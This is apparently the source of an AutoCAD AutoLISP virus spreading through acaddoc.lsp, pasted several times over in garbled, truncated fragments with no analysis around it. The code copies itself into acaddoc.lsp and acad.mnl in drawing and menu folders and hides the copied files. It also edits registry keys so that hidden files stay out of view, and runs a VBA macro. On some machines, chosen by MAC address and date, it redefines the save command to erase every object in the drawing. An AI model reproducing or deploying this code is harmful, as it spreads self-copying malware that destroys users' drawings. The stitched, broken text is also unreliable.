83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
